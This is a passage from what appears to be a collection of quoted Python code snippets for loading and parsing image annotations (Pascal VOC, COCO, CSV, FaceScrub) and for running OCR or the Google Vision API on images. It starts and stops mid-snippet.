vgg_preprocess_image(image, 224, 224, is_training=is_training)\n\n return image, label", "def _load_pascal_annotation(self, index):\n image = index\n im_path = self.image_path_from_index(image)\n im = cv2.imread(im_path)\n width = im.shape[1]\n height = im.shape[0]\n num_objs = 0\n for ix, obj in enumerate(image.objects):\n if image.objects[ix].x > width - 2 or image.objects[ix].y > height - 2:\n continue \n assert(image.objects[ix].width > 0)\n assert(image.objects[ix].height > 0)\n\n num_objs += 1\n\n boxes = np.zeros((num_objs, 4), dtype=np.float32)\n\n partial_entity_class = np.zeros((num_objs, 96), dtype=np.int32)\n partial_relation_class = np.zeros((num_objs, num_objs, 43), dtype=np.int32)\n gt_classes = np.zeros((0, num_objs, 1), dtype=np.int32)\n overlaps = np.zeros((0, num_objs, self.num_classes), dtype=np.int64)\n # \"Seg\" area for pascal is just the box area\n seg_areas = np.zeros((num_objs), dtype=np.float32)\n queries = np.zeros((0, 235), dtype=np.float32)\n # Load object bounding boxes into a data frame.\n index = 0\n \n for ix, obj in enumerate(image.objects):\n if image.objects[ix].x > width - 2 or image.objects[ix].y > height - 2:\n continue\n # Make pixel indexes 0-based\n x1_offset = 0.0#image.objects[ix].width * (-0.1)\n x2_offset = 0.0#image.objects[ix].width * 0.1\n y1_offset = 0.0#image.objects[ix].height * (-0.1)\n y2_offset = 0.0#image.objects[ix].height * 0.1\n boxes[index][0] = max((image.objects[ix].x + x1_offset), 0.0)\n boxes[index][1] = max((image.objects[ix].y + y1_offset), 0.0)\n boxes[index][2] = min((image.objects[ix].x + x2_offset + image.objects[ix].width), width - 1)\n boxes[index][3] = min((image.objects[ix].y + y2_offset + image.objects[ix].height), height - 1)\n seg_areas[index] = (boxes[index][2] - boxes[index][0] + 1.0) * (boxes[index][3] - boxes[index][1] + 1.0)\n index += 1\n assert (boxes[:, 2] > boxes[:, 0]).all()\n assert (boxes[:, 3]\t > boxes[:, 1]).all() \n #load gt classes\n \n i_index = 0\n for i in range(image.objects_labels.shape[0]):\n if image.objects[i].x > width - 2 or image.objects[i].y > height - 2:\n continue\n partial_entity_class[i_index] = image.objects_labels[i]\n \n j_index = 0\n for j in range(image.objects_labels.shape[0]):\n if image.objects[j].x > width - 2 or image.objects[j].y > height - 2:\n continue\n partial_relation_class[i_index, j_index] = image.predicates_labels[i, j]\n j_index += 1\n i_index += 1\n seen = []\n for query_index in range(image.queries_gt.shape[0]):\n query_gt_classes = np.zeros((1, num_objs, 1), dtype=np.int32)\n query_overlaps = np.zeros((1, num_objs, self.num_classes), dtype=np.int64)\n query_overlaps[0, :, 3] = 1\n query_gt_classes[0, :, 0] = 3\n if image.one_hot_relations_gt[query_index][-1] == 1:\n # print \"negative triplet\"\n continue\n\n sub = image.one_hot_relations_gt[query_index][:96]\n obj = image.one_hot_relations_gt[query_index][96:96 * 2]\n rel = image.one_hot_relations_gt[query_index][96 * 2:]\n key = str(np.argmax(sub)) + \"_\" + str(np.argmax(rel)) + \"_\" + str(np.argmax(obj))\n if key in seen:\n continue\n seen.append(key)\n\n found = False\n i_index = 0\n for i in range(image.objects_labels.shape[0]):\n if image.objects[i].x > width - 2 or image.objects[i].y > height - 2:\n continue\n if not np.array_equal(image.objects_labels[i], sub):\n i_index += 1\n continue\n j_index = 0\n for j in range(image.objects_labels.shape[0]):\n if image.objects[j].x > width - 2 or image.objects[j].y > height - 2:\n continue \n\n if not np.array_equal(image.objects_labels[j], obj):\n j_index 
+= 1\n continue\n if np.array_equal(rel, image.predicates_labels[i, j]):\n query_gt_classes[0, i_index, 0] = 1\n query_overlaps[0, i_index, 1] = 1\n query_overlaps[0, i_index, 3] = 0\n query_gt_classes[0, j_index, 0] = 2\n query_overlaps[0, j_index, 2] = 1\n query_overlaps[0, j_index, 3] = 0\n \n #partial_entity_class[i_index] = sub\n #partial_entity_class[j_index] = obj\n #partial_relation_class[i_index, j_index] = rel\n \n found = True\n j_index += 1\n i_index += 1\n if not found:\n continue\n gt_classes = np.concatenate((gt_classes, query_gt_classes), axis=0)\n overlaps = np.concatenate((overlaps, query_overlaps), axis=0)\n queries = np.concatenate((queries, image.one_hot_relations_gt[query_index].reshape([1,-1])), axis=0)\n\n return {'boxes': boxes,\n 'gt_classes': gt_classes,\n 'gt_overlaps': overlaps,\n 'flipped': False,\n 'seg_areas': seg_areas,\n 'query' : queries,\n 'partial_entity_class' : partial_entity_class,\n 'partial_relation_class' : partial_relation_class,\n 'orig_image': None}", "def generate_annotation(target, images, bbox_path):\n good_image_paths = []\n bad_image_paths = []\n bb = read_annotation_yolov5(bbox_path)\n for path in images:\n basename = os.path.basename(path) # extract file name only (e.g., bear_013.jpg)\n basename_no_ext = os.path.splitext(basename)[0] # extract file name (e.g., bear_013)\n\n label_filepath = os.path.join(target, f'{basename_no_ext}.txt')\n item = bb[int(basename_no_ext.split('_')[-1])] # e.g., 0.556, 0.6145, 0.3718, 0.5958\n # validation that annotation is between 0 and 1.\n if item[0] <= 0 or item[1] <= 0 or item[2] <= 0 or item[3] <= 0 \\\n or item[0] >= 1 or item[1] >= 1 or item[2] >= 1 or item[3] >= 1:\n print(f\"{basename_no_ext} has out of range value: {item[0]} {item[1]} {item[2]} {item[3]}\")\n bad_image_paths.append(path)\n continue\n\n with open(label_filepath, 'w') as out_file: # a label file is same as corresponding image file name\n cls_id = classes.index(cls)\n out_file.write(f\"{cls_id} {item[0]} {item[1]} {item[2]} {item[3]}\")\n good_image_paths.append(path)\n # print(f\"{basename_no_ext:} {cls_id} {item[0]} {item[1]} {item[2]} {item[3]}\")\n\n return good_image_paths, bad_image_paths", "def annotate(path):\n if not path:\n return\n\n client = vision.ImageAnnotatorClient()\n\n if path.startswith('http') or path.startswith('gs:'):\n image = types.Image()\n image.source.image_uri = path\n\n else:\n with io.open(path, 'rb') as image_file:\n content = image_file.read()\n\n image = types.Image(content=content)\n\n web_detection = client.web_detection(image=image).web_detection\n\n return web_detection", "def parser_image_data(jpeg_file_path):\n image = tf.io.read_file(jpeg_file_path)\n image = tf.image.decode_jpeg(image)\n image = tf.image.resize(image, [image_height, image_width])\n image = tf.cast(image, dtype=tf.float32)\n image = (image / 127.5) - 1.0\n return image", "def write_annotation(self, ann_file, img_path, new_img_name):\n if self.type == \"imagenet\":\n label = self.in_annotations[img_path]\n logger.debug(f\"Img {img_path}, imagenet label {label}\")\n ann_file.write(str(label) + \"\\n\")\n elif self.type == \"coco\":\n ann_file.write(\"detection_results {\\n\")\n for obj in self.in_annotations[img_path].keys():\n ann_file.write(\" objects {\\n\")\n ann_file.write(f\" class_id: {self.in_annotations[img_path][obj]['label']}\\n\")\n ann_file.write(\" bounding_box {\\n\")\n ann_file.write(f\" normalized_top: {self.in_annotations[img_path][obj]['normalized_bbox'][0]}\\n\")\n ann_file.write(f\" normalized_bottom: 
{self.in_annotations[img_path][obj]['normalized_bbox'][1]}\\n\")\n ann_file.write(f\" normalized_left: {self.in_annotations[img_path][obj]['normalized_bbox'][2]}\\n\")\n ann_file.write(f\" normalized_right: {self.in_annotations[img_path][obj]['normalized_bbox'][3]}\\n\")\n ann_file.write(\" }\\n\")\n ann_file.write(\" }\\n\")\n ann_file.write(f' image_name: \"{new_img_name}\"\\n')\n ann_file.write(f' image_id: {int(new_img_name.split(\".\")[0])}\\n')\n ann_file.write(\"}\\n\")", "def parse(self, infile):\r\n raise NotImplementedError()", "def load_annotations(self):\n # get keys\n with open(self.ann_file, 'r') as fin:\n keys = [line.strip().split(' ')[0] for line in fin]\n # get frame index list for LQ frames\n frame_index_list = []\n for i in range(self.num_input_frames):\n # Each clip of Vimeo90K has 7 frames starting from 1. So we use 9\n # for generating frame_index_list:\n # N | frame_index_list\n # 1 | 4\n # 3 | 3,4,5\n # 5 | 2,3,4,5,6\n # 7 | 1,2,3,4,5,6,7\n frame_index_list.append(i + (9 - self.num_input_frames) // 2)\n\n data_infos = []\n for key in keys:\n folder, subfolder = key.split('/')\n lq_paths = []\n for i in frame_index_list:\n lq_paths.append(\n osp.join(self.lq_folder, folder, subfolder, f'im{i}.png'))\n gt_paths = [osp.join(self.gt_folder, folder, subfolder, 'im4.png')]\n\n data_infos.append(\n dict(lq_path=lq_paths, gt_path=gt_paths, key=key))\n\n return data_infos", "def _read_annotations(csv_reader, classes):\n result = {}\n for line, row in enumerate(csv_reader):\n line += 1\n\n try:\n img_file, x1, y1, x2, y2, class_name = row[:6]\n except ValueError:\n raise_from(ValueError(\n 'line {}: format should be \\'img_file,x1,y1,x2,y2,class_name\\' or \\'img_file,,,,,\\''.format(line)),\n None)\n\n if img_file not in result:\n result[img_file] = []\n\n # If a row contains only an image path, it's an image without annotations.\n if (x1, y1, x2, y2, class_name) == ('', '', '', '', ''):\n continue\n\n x1 = _parse(x1, int, 'line {}: malformed x1: {{}}'.format(line))\n y1 = _parse(y1, int, 'line {}: malformed y1: {{}}'.format(line))\n x2 = _parse(x2, int, 'line {}: malformed x2: {{}}'.format(line))\n y2 = _parse(y2, int, 'line {}: malformed y2: {{}}'.format(line))\n\n # Check that the bounding box is valid.\n if x2 <= x1:\n raise ValueError('line {}: x2 ({}) must be higher than x1 ({})'.format(line, x2, x1))\n if y2 <= y1:\n raise ValueError('line {}: y2 ({}) must be higher than y1 ({})'.format(line, y2, y1))\n\n # check if the current class name is correctly present\n if class_name not in classes:\n raise ValueError('line {}: unknown class name: \\'{}\\' (classes: {})'.format(line, class_name, classes))\n\n result[img_file].append({'x1': x1, 'x2': x2, 'y1': y1, 'y2': y2, 'class': class_name})\n return result", "def parse_image_meta(meta):\n image_id = meta[:, 0]\n image_shape = meta[:, 1:4]\n window = meta[:, 4:8] # (x1, y1, x2, y2) window of image in in pixels\n active_class_ids = meta[:, 8:]\n return image_id, image_shape, window, active_class_ids", "def handleImageRunner(self) :\n tag = self.readByte()\n if tag == ord(self.imagerunnermarker1[-1]) :\n oldpos = self.pos-2\n codop = self.minfile[self.pos:self.pos+2]\n length = unpack(\">H\", self.minfile[self.pos+6:self.pos+8])[0]\n self.pos += 18\n if codop != self.imagerunnermarker2 :\n self.pos += length\n self.logdebug(\"IMAGERUNNERTAG SKIP %i AT %08x\" % (self.pos-oldpos, self.pos))\n else :\n self.pos -= 1 # Adjust position", "def _load_nimble_annotation(self, index):\n filename = os.path.join(self._data_path, 
'Annotations_Python', index + '.json')\n #currently only one bbox is considered.\n assert os.path.exists(cache_file),'Annotation {} has to be here'.format(filename)\n \n num_objs = 1\n boxes = np.zeros((num_objs, 4), dtype=np.uint16)\n gt_classes = np.zeros((num_objs), dtype=np.int32)\n overlaps = np.zeros((num_objs, self.num_classes), dtype=np.float32)\n # \"Seg\" area for pascal is just the box area\n seg_areas = np.zeros((num_objs), dtype=np.float32)\n\n f = open(filename,'r')\n\n # Load object bounding boxes into a data frame.\n for ix, obj in enumerate(objs):\n cls = 1 \n gtboxes_1[ix, :] = obj.bbox\n gtboxes_2[ix,:] = obj.gtbbox\n gt_classes_1[ix] = cls\n overlaps_1[ix, cls] = 1.0\n seg_areas_1[ix] = 0\n gt_classes_1[ix] = cls\n overlaps_1[ix, cls] = 1.0\n seg_areas_1[ix] = 0\n\n overlaps = scipy.sparse.csr_matrix(overlaps)\n\n return {'donor_file' : donor_file,\n 'boxes_1' : gtboxes_1,\n 'boxes_2' : gtboxes_2,\n 'gt_classes_1': gt_classes_1,\n 'gt_overlaps_1' : overlaps_1,\n 'gt_classes_2': gt_classes_2,\n 'gt_overlaps_2' : overlaps_2,\n 'flipped' : False,\n 'seg_areas_1' : seg_areas_1,\n 'seg_areas_2' : seg_areas_2}", "def extract(self, source):\n\t\tp = Parser()\n\t\tf = open_pds(source)\n\t\tif self.log: self.log.debug(\"Parsing '%s'\" % (source))\n\t\tself.labels = p.parse(f)\n\t\tif self.log: self.log.debug(\"Found %d labels\" % (len(self.labels)))\n\t\tif self._check_image_is_supported():\n\t\t\tif self.log: self.log.debug(\"Image in '%s' is supported\" % (source))\n\t\t\tdim = self._get_image_dimensions()\n\t\t\tloc = self._get_image_location()\n\t\t\timageSampleBits = int(self.labels['IMAGE']['SAMPLE_BITS'])\n\t\t\timageSampleType = self.labels['IMAGE']['SAMPLE_TYPE']\n\t\t\tmd5Checksum = self._get_image_checksum()\n\t\t\tif self.log: self.log.debug(\"Image dimensions should be %s\" % (str(dim)))\n\t\t\tif self.log: self.log.debug(\"Seeking to image data at %d\" % (loc))\n\t\t\tf.seek(loc)\n\t\t\tif imageSampleBits == 8:\n\t\t\t\treadSize = dim[0] * dim[1]\n\t\t\telif imageSampleBits == 16:\n\t\t\t\treadSize = dim[0] * dim[1] * 2\n\t\t\tprint readSize\n\t\t\tif self.log: self.log.debug(\"Seek successful, reading data (%s)\" % (readSize))\n\t\t\t# rawImageData = f.readline()\n\t\t\t# f.seek(-int(self.labels[\"RECORD_BYTES\"]), os.SEEK_CUR)\n\t\t\trawImageData = f.read(readSize)\n\t\t\tif md5Checksum:\n\t\t\t\trawImageChecksum = hashlib.md5(rawImageData).hexdigest()\n\t\t\t\tchecksumVerificationPassed = rawImageChecksum == md5Checksum and True or False\n\t\t\t\tif not checksumVerificationPassed:\n\t\t\t\t\tif self.log: self.log.debug(\"Secure hash verification failed\")\n\t\t\t\t\tif self.raisesChecksumError:\n\t\t\t\t\t\terrorMessage = \"Verification failed! 
Expected '%s' but got '%s'.\" % (md5Checksum, rawImageChecksum)\n\t\t\t\t\t\traise ChecksumError, errorMessage\n\t\t\t\telse:\n\t\t\t\t\tif self.log: self.log.debug(\"Secure hash verification passed\")\n\t\t\tif self.log: self.log.debug(\"Read successful (len: %d), creating Image object\" % (len(rawImageData)))\n\t\t\t# The frombuffer defaults may change in a future release;\n\t\t\t# for portability, change the call to read:\n\t\t\t# frombuffer(mode, size, data, 'raw', mode, 0, 1).\n\t\t\tif (imageSampleBits == 16) and imageSampleType == ('MSB_INTEGER'):\n\t\t\t\t#img = Image.frombuffer('I', dim, rawImageData, 'raw', 'I;16BS', 0, 1)\n\t\t\t\timg = Image.frombuffer('F', dim, rawImageData, 'raw', 'F;16B', 0, 1)\n\t\t\t\timg = ImageMath.eval(\"convert(a/16.0, 'L')\", a=img)\n\t\t\telse:\n\t\t\t\timg = Image.frombuffer('L', dim, rawImageData, 'raw', 'L', 0, 1)\n\t\t\tif self.log:\n\t\t\t\tself.log.debug(\"Image result: %s\" % (str(img)))\n\t\t\t\tself.log.debug(\"Image info: %s\" % (str(img.info)))\n\t\t\t\tself.log.debug(\"Image mode: %s\" % (str(img.mode)))\n\t\t\t\tself.log.debug(\"Image size: %s\" % (str(img.size)))\n\t\telse:\n\t\t\tif self.log: self.log.error(\"Image is not supported '%s'\" % (source))\n\t\t\timg = None\n\t\tf.close()\n\n\t\treturn img, self.labels", "def parse(self):\n imset = []\n imdir = remkdir(os.path.join(self._datadir, 'images'))\n csv_actors = readcsv(os.path.join(self._datadir, 'facescrub_actors.txt'), separator='\\t')\n for (subjectname, imageid, faceid, url, bbox, sha256) in csv_actors[1:]:\n categoryname = subjectname.replace(' ', '_')\n (xmin,ymin,xmax,ymax) = bbox.split(',')\n imset.append(ImageDetection(url=url, filename=os.path.join(imdir, '%s_%s.jpg' % (categoryname, imageid)), category=categoryname, xmin=xmin, ymin=ymin, xmax=xmax, ymax=ymax, attributes={'GENDER':'male'}))\n\n csv_actresses = readcsv(os.path.join(self._datadir, 'facescrub_actresses.txt'), separator='\\t')\n for (subjectname, imageid, faceid, url, bbox, sha256) in csv_actresses[1:]:\n categoryname = subjectname.replace(' ', '_')\n (xmin,ymin,xmax,ymax) = bbox.split(',')\n imset.append(ImageDetection(url=url, filename=os.path.join(imdir, '%s_%s.jpg' % (categoryname, imageid)), category=categoryname, xmin=xmin, ymin=ymin, xmax=xmax, ymax=ymax, attributes={'GENDER':'female'}))\n\n return imset", "def parse_metadata_file(self, file):\n\n file_keys = list(file.keys())\n\n if 'labelAnnotations' in file_keys:\n file_annots = file['labelAnnotations']\n file_top_score = np.asarray(\n [x['score'] for x in file_annots]).mean()\n file_top_desc = [x['description'] for x in file_annots]\n else:\n file_top_score = np.nan\n file_top_desc = ['']\n\n file_colors = file['imagePropertiesAnnotation']['dominantColors'][\n 'colors']\n file_crops = file['cropHintsAnnotation']['cropHints']\n\n file_color_score = np.asarray([x['score'] for x in file_colors]).mean()\n file_color_pixelfrac = np.asarray(\n [x['pixelFraction'] for x in file_colors]).mean()\n\n file_crop_conf = np.asarray(\n [x['confidence'] for x in file_crops]).mean()\n\n if 'importanceFraction' in file_crops[0].keys():\n file_crop_importance = np.asarray(\n [x['importanceFraction'] for x in file_crops]).mean()\n else:\n file_crop_importance = np.nan\n\n df_metadata = {\n 'annots_score': file_top_score,\n 'color_score': file_color_score,\n 'color_pixelfrac': file_color_pixelfrac,\n 'crop_conf': file_crop_conf,\n 'crop_importance': file_crop_importance,\n 'annots_top_desc': self.sentence_sep.join(file_top_desc)\n }\n\n df_metadata = 
pd.DataFrame.from_dict(df_metadata, orient='index').T\n df_metadata = df_metadata.add_prefix('metadata_')\n\n return df_metadata", "def _load_pascal_annotations(self, index):\n image_name = self._image_index[index]\n filename = os.path.join(self._data_path, 'Annotations', image_name + '.xml')\n tree = xmlET.parse(filename)\n objs = tree.findall('object')\n if not self.config['use_diff']:\n # Exclude the samples labeled as difficult\n non_diff_objs = [\n obj for obj in objs if int(obj.find('difficult').text) == 0]\n if len(non_diff_objs) != len(objs):\n print 'Removed {} difficult objects'.format(len(objs) - len(non_diff_objs))\n objs = non_diff_objs\n num_objs = len(objs)\n\n boxes = np.zeros((num_objs, 4), dtype=np.uint16)\n gt_classes = np.zeros(num_objs, dtype=np.int32)\n overlaps = np.zeros((num_objs, self.num_classes), dtype=np.float32)\n\n # Load object bounding boxes into a data frame.\n # boxes[ind, :] will be boxes\n # gt_classes[ind] will be the associated class name for this box\n # overlaps[ind, class] will assign 1.0 to ground truth\n for ix, obj in enumerate(objs):\n bbox = obj.find('bndbox')\n # Make pixel indexes 0-based\n x1 = float(bbox.find('xmin').text) - 1\n y1 = float(bbox.find('ymin').text) - 1\n x2 = float(bbox.find('xmax').text) - 1\n y2 = float(bbox.find('ymax').text) - 1\n cls = self._class_to_ind[obj.find('name').text.lower().strip()]\n boxes[ix, :] = [x1, y1, x2, y2]\n gt_classes[ix] = cls\n overlaps[ix, cls] = 1.0\n\n overlaps = scipy.sparse.csr_matrix(overlaps)\n return {'boxes': boxes,\n 'gt_classes': gt_classes,\n 'gt_overlaps': overlaps,\n 'flipped': False}", "def main_picamera():\n #takephoto() # First take a picture\n\n credentials = GoogleCredentials.get_application_default()\n service = discovery.build('vision', 'v1', credentials=credentials)\n\n with open('image.jpg', 'rb') as image:\n # image_content = base64.b64encode(image.read())\n image_content = image.read()\n service_request = service.images().annotate(body={\n 'requests': [{\n 'image': {\n 'content': image_content.decode('UTF-8')\n },\n 'features': [{\n 'type': 'LOGO_DETECTION',\n 'maxResults': 1\n }]\n }]\n })\n response = service_request.execute()\n\n try:\n label = response['responses'][0]['logoAnnotations'][0]['description']\n except:\n label = \"No response.\"\n\n print(label)", "def process(image):\n pass", "def _process_img_semantic(self, sensor_data):\n sensor_data.convert(self.cc)\n img = np.array(sensor_data.raw_data).reshape((self.img_y, self.img_x, 4))\n img = img[:, :, :3] # sensor is actualy rgba, we dont need alpha values\n self.semantic = img # need to scale rgb values to be {0,1}", "def load_annotations(self, index):\n anns_file = open(os.path.join(self.folder_path, self.image_ids[index] + '.json'))\n labels = json.load(anns_file)\n labels = labels[\"shapes\"]\n anns_file.close()\n return labels.copy()", "def parse_image_filename(filename):\n\n # regexes\n starts_with_six_digits = re.compile(r'^\\d{6}')\n capital_letter = re.compile(r'([A-Z]{1})')\n plus = re.compile(r'\\+')\n\n # split the filename and extention\n filename, extension = os.path.splitext(filename)\n try:\n style_number, color, description = filename.split('_')\n except Exception as e:\n print(e)\n print(filename, extension)\n\n style_number = int(style_number)\n\n # decode the color\n # intCaps -> int/caps\n color = capital_letter.sub(r'/\\1', color).lower()\n # plus+to+space -> plus to space\n color = plus.sub(r' ', color)\n\n # decode the description\n description = plus.sub(r' ', description)\n\n return 
style_number, color, description", "def extract_info(models_folder: str, image_path: str) -> Person:\n person = Person('test', datetime.date.today(), 'test', 'test', 'test')\n\n tools = pyocr.get_available_tools()\n if len(tools) == 0:\n print(\"No OCR tool found\")\n sys.exit(1)\n\n # odaberemo Tessract - prvi na listi ako je jedini alat\n tool = tools[0]\n print(\"Koristimo backend: %s\" % (tool.get_name()))\n # biramo jezik očekivanog teksta\n lang = 'eng'\n\n # TODO - Prepoznati sve neophodne vrednosti o osobi sa slike. Vrednosti su: Name, Date of Birth, Job,\n # Social Security Number, Company Name\n\n image = cv2.imread(image_path)\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n original = image.copy()\n plt.imshow(image)\n plt.show()\n\n # todo rotate image\n canimg = cv2.Canny(gray, 50, 200)\n lines = cv2.HoughLines(canimg, 1, np.pi / 180.0, 200, np.array([]))\n rho, theta = lines[0][0]\n\n plt.imshow(image)\n # plt.show()\n\n (h, w) = image.shape[:2]\n center = (w // 2, h // 2)\n M = cv2.getRotationMatrix2D(center, 180 * theta / 3.1415926 - 90, 1.0)\n newImage = cv2.warpAffine(image, M, (w, h), flags=cv2.INTER_CUBIC, borderMode=cv2.BORDER_REPLICATE)\n plt.imshow(newImage)\n plt.show()\n\n if is_similar(original, newImage):\n rho, theta = findparallel_web(lines)[0][0]\n (h, w) = image.shape[:2]\n center = (w // 2, h // 2)\n M = cv2.getRotationMatrix2D(center, 180 * theta / 3.1415926 - 90, 1.0)\n newImage = cv2.warpAffine(image, M, (w, h), flags=cv2.INTER_CUBIC, borderMode=cv2.BORDER_REPLICATE)\n plt.imshow(newImage)\n plt.show()\n\n freshNewImage = newImage.copy()\n\n # todo ekstrakcije kartice\n canimg = cv2.Canny(cv2.cvtColor(newImage, cv2.COLOR_BGR2GRAY), 50, 200)\n lines = cv2.HoughLines(canimg, 1, np.pi / 180.0, 180, np.array([]))\n min_x = 999\n max_x = 1\n min_y = 999\n max_y = 1\n for line in lines:\n rho, theta = line[0]\n a = np.cos(theta)\n b = np.sin(theta)\n x0 = a * rho\n y0 = b * rho\n x1 = int(x0 + 1000 * (-b))\n y1 = int(y0 + 1000 * (a))\n x2 = int(x0 - 1000 * (-b))\n y2 = int(y0 - 1000 * (a))\n cv2.line(newImage, (x1, y1), (x2, y2), (0, 0, 255), 2)\n\n if 0 < y1 < 1000 and y1 > max_y:\n max_y = y1\n if 0 < y1 < 1000 and y1 < min_y:\n min_y = y1\n if 0 < x1 < 1000 and x1 < min_x:\n min_x = x1\n if 0 < x1 < 1000 and x1 > max_x:\n max_x = x1\n\n plt.imshow(newImage)\n # plt.show()\n\n height, width, channels = newImage.shape\n\n if min_x == 999:\n min_x = 0\n if max_x == 1:\n max_x = width\n if min_y == 999:\n min_y = 0\n if max_y == 1:\n max_y = height\n if min_y == max_y:\n min_y = 0\n max_y = height\n if min_x == max_x:\n min_x = 0\n max_x = width\n crop_img = freshNewImage[min_y:max_y, min_x:max_x]\n\n plt.imshow(crop_img)\n plt.show()\n\n path = image_path[-11:]\n full_path = 'cropped/' + path\n cv2.imwrite(full_path, crop_img)\n\n canimg = cv2.Canny(cv2.cvtColor(crop_img, cv2.COLOR_BGR2RGB), 50, 200)\n plt.imshow(canimg)\n # plt.show()\n\n img = cv2.detailEnhance(crop_img, sigma_s=3, sigma_r=0.55)\n plt.imshow(img)\n plt.show()\n\n # todo ekstrakcija teksta\n # text = tool.image_to_string(\n # Image.fromarray(img),\n # lang=lang,\n # builder=pyocr.builders.TextBuilder(tesseract_layout=1) # izbor segmentacije (PSM)\n # )\n\n line_and_word_boxes = tool.image_to_string(\n Image.fromarray(img), lang=lang,\n builder=pyocr.builders.LineBoxBuilder(tesseract_layout=3)\n )\n\n for i, line in enumerate(line_and_word_boxes):\n # print('line %d' % i)\n print(line.content, line.position, i)\n # print('boxes')\n if 'ibm' 
in line.content.lower():\n person.company = 'IBM'\n try:\n person.name = line_and_word_boxes[2].content\n person.ssn = line_and_word_boxes[3].content\n person.job = line_and_word_boxes[4].content[5:]\n except:\n return person\n break\n # person.date_of_birth = datetime.AnyStr(line_and_word_boxes[5].content)\n if 'apple' in line.content.lower():\n person.company = 'Apple'\n try:\n person.job = line_and_word_boxes[1].content\n person.name = line_and_word_boxes[2].content\n person.ssn = line_and_word_boxes[8].content\n except:\n return person\n break\n if 'google' in line.content.lower():\n person.company = 'Google'\n try:\n person.name = line_and_word_boxes[9].content\n person.ssn = line_and_word_boxes[10].content\n person.job = line_and_word_boxes[11].content\n except:\n return person\n break\n # for box in line.word_boxes:\n # print(box.content, box.position, box.confidence)\n # print()\n\n return person\n\n # # todo detekcija broja\n # digits = tool.image_to_string(\n # Image.fromarray(image),\n # lang=lang,\n # builder=pyocr.builders.DigitBuilder(tesseract_layout=3) # ocekivani text je single line, probati sa 3,4,5..\n # )\n\n # # todo izlaz lista reči sa tekstom, koordinatama i faktorom sigurnosti\n # word_boxes = tool.image_to_string(\n # Image.fromarray(image),\n # lang=lang,\n # builder=pyocr.builders.WordBoxBuilder(tesseract_layout=3)\n # )\n # for i, box in enumerate(word_boxes):\n # print(\"word %d\" % i)\n # print(box.content, box.position, box.confidence)\n # print()\n\n # # todo izlaz po redovima\n # line_and_word_boxes = tool.image_to_string(\n # Image.fromarray(image), lang=lang,\n # builder=pyocr.builders.LineBoxBuilder(tesseract_layout=3)\n # )\n # for i, line in enumerate(line_and_word_boxes):\n # print('line %d' % i)\n # print(line.content, line.position)\n # print('boxes')\n # for box in line.word_boxes:\n # print(box.content, box.position, box.confidence)\n # print()", "def load_face_instances(txt, annotation_dirname, image_root, class_names):\n # Needs to read many small annotation files. 
Makes sense at local\n\n lines = open(txt).readlines()\n dicts = []\n for line in lines:\n fileid = line.strip()\n jpeg_file = os.path.join(image_root, fileid + \".jpg\")\n anno_file = os.path.join(annotation_dirname, fileid + \".xml\")\n\n with PathManager.open(anno_file) as f:\n tree = ET.parse(f)\n\n r = {\n \"file_name\": jpeg_file,\n \"image_id\": fileid,\n \"height\": int(tree.findall(\"./size/height\")[0].text),\n \"width\": int(tree.findall(\"./size/width\")[0].text),\n }\n instances = []\n\n for obj in tree.findall(\"object\"):\n cls = obj.find(\"name\").text\n # We include \"difficult\" samples in training.\n # Based on limited experiments, they don't hurt accuracy.\n # difficult = int(obj.find(\"difficult\").text)\n # if difficult == 1:\n # continue\n bbox = obj.find(\"bndbox\")\n bbox = [float(bbox.find(x).text) for x in [\"xmin\", \"ymin\", \"xmax\", \"ymax\"]]\n # Original annotations are integers in the range [1, W or H]\n # Assuming they mean 1-based pixel indices (inclusive),\n # a box with annotation (xmin=1, xmax=W) covers the whole image.\n # In coordinate space this is represented by (xmin=0, xmax=W)\n bbox[0] -= 1.0\n bbox[1] -= 1.0\n instances.append(\n {\"category_id\": class_names.index(cls), \"bbox\": bbox, \"bbox_mode\": BoxMode.XYXY_ABS}\n )\n r[\"annotations\"] = instances\n dicts.append(r)\n\n return dicts", "def _parse_ann_info(self, idx, with_mask=True):\n\n img_id = self.img_infos[idx]['id']\n ann_ids = self.coco.getAnnIds(imgIds=[img_id])\n ann_info = self.coco.loadAnns(ann_ids)\n\n gt_bboxes = []\n gt_labels = []\n gt_bboxes_ignore = []\n rf_imgs = []\n rf_masks = []\n rf_ann_ids = []\n # Two formats are provided.\n # 1. mask: a binary map of the same size of the image.\n # 2. polys: each mask consists of one or several polys, each poly is a\n # list of float.\n\n # choose category in train split\n i = 1 if self.test_mode else 0\n index = np.random.randint(len(ann_info))\n cat = ann_info[index]['category_id']\n while cat not in self.cats[i]:\n index = np.random.randint(len(ann_info))\n cat = ann_info[index]['category_id']\n\n for _ in range(self.k_shot):\n flag = True \n\n while flag: \n rf_img_ids = self.coco.getImgIds(catIds=[cat])\n rf_img_id = rf_img_ids[np.random.randint(0, len(rf_img_ids))]\n while rf_img_id == img_id:\n rf_img_id = rf_img_ids[np.random.randint(0, len(rf_img_ids))]\n\n rf_ann_ids_ = self.coco.getAnnIds(imgIds=rf_img_id, catIds=[cat], iscrowd=False)\n\n if len(rf_ann_ids_) > 0:\n flag = False\n rf_ann_id = rf_ann_ids_[np.random.randint(0, len(rf_ann_ids_))]\n\n rf_ann = self.coco.loadAnns([rf_ann_id])[0]\n\n rf_mask = self.coco.annToMask(rf_ann)\n\n rf_img_file = self.coco.loadImgs([rf_img_id])[0]['file_name']\n\n rf_img = mmcv.imread(osp.join(self.img_prefix, rf_img_file))\n \n rf_img, rf_mask = prepare_rf(rf_img, rf_ann, cat, rf_mask, enlarge=self.enlarge_ref)\n\n rf_imgs.append(rf_img)\n rf_masks.append(rf_mask)\n rf_ann_ids.append(rf_ann_id)\n\n if self.with_mask:\n gt_masks = []\n gt_mask_polys = []\n gt_poly_lens = []\n for i, ann in enumerate(ann_info):\n if ann.get('ignore', False):\n continue\n x1, y1, w, h = ann['bbox']\n if ann['area'] <= 0 or w < 1 or h < 1:\n continue\n bbox = [x1, y1, x1 + w - 1, y1 + h - 1]\n if ann['iscrowd']:\n gt_bboxes_ignore.append(bbox)\n elif ann['category_id'] == cat:\n gt_bboxes.append(bbox)\n gt_labels.append(1) # change here\n # gt_labels.append(self.trans_form_label[cat])\n else:\n continue\n\n if self.with_mask:\n gt_masks.append(self.coco.annToMask(ann))\n mask_polys = [\n p for p in 
